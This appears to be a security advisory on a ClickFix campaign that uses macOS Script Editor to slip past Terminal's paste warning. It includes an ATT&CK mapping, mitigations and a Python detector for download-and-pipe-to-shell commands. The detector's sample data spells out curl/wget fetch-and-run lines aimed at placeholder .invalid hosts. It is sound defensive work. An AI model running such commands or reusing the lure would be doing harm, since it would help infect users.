
ClickFix Malware Campaign Evades macOS Defenses via Script Editor

A ClickFix social engineering campaign bypasses macOS security warnings by using Script Editor to execute malicious commands, marking a significant evolution in Mac-targeting malware.


Executive Summary

A ClickFix malware campaign has developed a novel method to circumvent critical security warnings in macOS Sequoia (15.x) and Sonoma (14.x). The threat actors have shifted from instructing victims to paste malicious commands directly into Terminal—a process now flagged by Apple's pasteboard protections—to using the built-in Script Editor application. This technique effectively bypasses system warnings, demonstrating an adaptive social engineering tactic that increases the risk of successful infection for Mac users.

Technical Analysis

According to analysis by Malwarebytes, the core of this evasion lies in exploiting the functional difference between Terminal and Script Editor. Starting with macOS Sonoma, Apple introduced a security feature that warns users when pasting a command into Terminal, specifically checking the pasteboard for known malicious patterns. The ClickFix campaign, which typically uses fake tech support pop-ups to lure victims, previously relied on victims pasting curl or bash commands directly into Terminal to download and execute payloads.

The new method instructs users to open Script Editor (located in /Applications/Utilities/), create a new document, and paste the malicious command there. The attacker's script then uses the do shell script AppleScript command to execute the pasted content. Critically, the pasteboard warning is tied to the Terminal application. Since Script Editor is not subject to the same pasteboard inspection, the malicious command executes without triggering Apple's built-in alert. The final execution chain typically involves downloading a second-stage payload, often a disguised installer package, from a compromised website.

Tactics, Techniques & Procedures

The campaign employs a consistent TTP matrix:

  • Tactic: Initial Access (TA0001)
    • Technique: Drive-by Compromise (T1189): Victims encounter fake browser alerts or pop-ups claiming their system is infected or has a critical error.
    • Technique: User Execution (T1204): Social engineering lures users into following instructions to "fix" the non-existent problem.
  • Tactic: Execution (TA0002)
    • Technique: Command and Scripting Interpreter (T1059): Abuse of macOS's Script Editor and the do shell script command to execute a malicious shell script.
    • Sub-technique: AppleScript (T1059.002): The primary execution mechanism within Script Editor.
  • Tactic: Defense Evasion (TA0005)
    • Technique: Abuse Execution Guardrails (T1480): Specifically bypassing the pasteboard warning guardrail designed for Terminal.app.
    • Technique: Masquerading (T1036): Final payloads are often signed, illegitimate installer packages (.pkg files) posing as legitimate software.

Threat Actor Context

The threat actor behind these campaigns is tracked under the name ClickFix. This is not a sophisticated APT group but a financially motivated entity that operates large-scale, opportunistic social engineering campaigns. Their primary focus has been macOS users for several years, constantly iterating on delivery methods to overcome Apple's security improvements. Their persistence indicates a successful, profit-driven operation that adapts to the changing security landscape of the macOS platform.

Mitigations & Recommendations

  1. User Education: This attack chain requires significant user interaction. Train users to be skeptical of unsolicited browser pop-ups warning of infections, especially those that provide phone numbers or direct technical instructions. Emphasize that legitimate Apple security warnings will not ask users to copy and paste commands.
  2. Application Control: Use macOS's built-in Gatekeeper and consider supplemental endpoint security tools that can restrict execution of osascript or Script Editor from web-browser-derived processes, or that can flag do shell script commands containing curl | bash patterns.
  3. Network Filtering: Implement outbound web filtering or DNS security to block connections to known malicious domains and newly registered domains (NRDs), which are commonly used in these campaigns for payload delivery.
  4. Principle of Least Privilege: Ensure standard user accounts do not have administrative privileges. The final payload often requires a user password to install, providing a final opportunity to halt the infection.
  5. Vigilance on Updates: While this technique bypasses a specific warning, keeping macOS fully updated ensures all other layered security protections are active.
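The detection idea in recommendation 2 (flag do shell script commands that pipe a download into a shell, and watch shells spawned by Script Editor or osascript) can be expressed as two small checks. The following is an added example written for this page, not code from Malwarebytes or Apple; it runs over constructed sample data (an AppleScript snippet and a few process-creation records with a reserved .invalid domain), and the executable paths for Script Editor, Terminal and osascript are assumptions about a stock macOS layout.

```python
"""Defender-side checks for the ClickFix Script Editor pattern.

1. Static check: scan AppleScript source for `do shell script` string
   literals that download something and pipe it into a shell.
2. Runtime check: scan process-creation events for a shell whose command
   line shows the same pattern, rating it higher when the parent is an
   AppleScript host (Script Editor or osascript).
All sample data below is constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed paths of the AppleScript hosts on a stock macOS install.
SCRIPT_EDITOR = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
APPLESCRIPT_HOSTS = {SCRIPT_EDITOR, "/usr/bin/osascript"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

# "fetch with curl/wget, then pipe straight into sh/bash/zsh"
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.IGNORECASE
)
# `do shell script "<literal>"` with optional `with administrator privileges`;
# the literal may contain \" and \\ escapes.
DO_SHELL_SCRIPT = re.compile(
    r"do\s+shell\s+script\s+\"((?:[^\"\\]|\\.)*)\""
    r"(\s+with\s+administrator\s+privileges)?",
    re.IGNORECASE,
)


@dataclass
class ShellScriptHit:
    command: str    # the shell command AppleScript would run
    elevated: bool  # True if it asks for administrator privileges


def _unescape(literal: str) -> str:
    """Resolve AppleScript string escapes (\\" and \\\\)."""
    return re.sub(r"\\(.)", r"\1", literal)


def scan_applescript(source: str) -> List[ShellScriptHit]:
    """Return every do shell script command that pipes a download into a shell."""
    hits = []
    for m in DO_SHELL_SCRIPT.finditer(source):
        cmd = _unescape(m.group(1))
        if PIPE_TO_SHELL.search(cmd):
            hits.append(ShellScriptHit(cmd, m.group(2) is not None))
    return hits


@dataclass
class ProcessEvent:
    pid: int
    image: str         # executable path of the new process
    parent_image: str  # executable path of its parent
    cmdline: str


@dataclass
class Finding:
    pid: int
    severity: str
    reason: str


def inspect_event(ev: ProcessEvent) -> Optional[Finding]:
    """Flag a shell whose command line pipes a download into an interpreter."""
    if ev.image not in SHELLS or not PIPE_TO_SHELL.search(ev.cmdline):
        return None
    if ev.parent_image in APPLESCRIPT_HOSTS:
        return Finding(ev.pid, "high", "pipe-to-shell spawned by " + ev.parent_image)
    return Finding(ev.pid, "medium", "pipe-to-shell spawned by " + ev.parent_image)


def scan_events(events: List[ProcessEvent]) -> List[Finding]:
    return [f for f in (inspect_event(e) for e in events) if f is not None]


# Constructed AppleScript resembling a lure; the domain is reserved and unreachable.
SAMPLE_SCRIPT = '''\
-- constructed sample for detection testing
display dialog "Applying fix, please wait..."
do shell script "curl -fsSL https://updates.example.invalid/fix.sh | bash"
do shell script "echo \\"benign\\" > /tmp/note.txt"
do shell script "curl -fsSL https://updates.example.invalid/pkg.sh | sh" with administrator privileges
'''

# Constructed process-creation records, as an EDR or Endpoint Security client would report them.
SAMPLE_EVENTS = [
    ProcessEvent(701, "/bin/sh", SCRIPT_EDITOR,
                 "sh -c curl -fsSL https://updates.example.invalid/fix.sh | bash"),
    ProcessEvent(702, "/bin/sh", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
                 "sh -c ls -la ~/Downloads"),
    ProcessEvent(703, "/bin/zsh", "/usr/bin/osascript",
                 "zsh -c wget -qO- https://cdn.example.invalid/a.sh | sh"),
    ProcessEvent(704, "/bin/sh", "/Applications/iTerm.app/Contents/MacOS/iTerm2",
                 "sh -c curl -s https://cdn.example.invalid/b.sh | sh"),
]

if __name__ == "__main__":
    for hit in scan_applescript(SAMPLE_SCRIPT):
        print("script:", hit)
    for finding in scan_events(SAMPLE_EVENTS):
        print("event:", finding)
```

In practice the ProcessEvent fields come from an Endpoint Security or EDR process-exec feed, and the static check is applied to .scpt or .applescript text handed to an endpoint scanner. The parent-image check is what distinguishes this campaign from an administrator who types a curl | bash line into a terminal, which is why that case is rated medium rather than high; the elevated flag on the static hit maps to recommendation 4, since it marks the point where a non-admin account would stop the chain.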
